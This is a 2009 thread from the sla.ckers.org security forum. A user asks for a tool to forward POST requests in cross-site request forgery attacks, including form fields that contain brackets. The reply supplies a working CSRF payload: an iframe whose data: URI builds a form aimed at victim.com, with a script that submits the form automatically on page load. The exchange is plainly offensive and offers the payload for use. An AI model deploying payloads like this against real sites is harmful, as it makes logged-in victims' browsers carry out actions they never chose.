Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
CSRF POST forwarding?
Posted by: SW
Date: August 21, 2009 11:37PM

Hi guys,

Does anyone have a robust tool made to do this?

I saw one on google (CSRF POST Forwarder or something), but it doesn't work with brackets in the form fields which I incidentally happen to need in this case.

Peace

Options: ReplyQuote
Re: CSRF POST forwarding?
Posted by: barbarianbob
Date: August 22, 2009 10:35AM

Not sure if this is what you want:

<iframe src="
  data:text/html;utf-8,
  <form id='f' action='http://victim.com/form.php' method='post'>
  <input name='someName' value='itsValue'/>
  <input type='submit'/>
  </form>
  <script>window.onload=function(){document.getElementById('f').submit();}</script>
"></iframe>

Take note that the entire form is in the iframe src attribute.



Edited 1 time(s). Last edit at 08/22/2009 10:37AM by barbarianbob.

Options: ReplyQuote


Sorry, only registered users may post in this forum.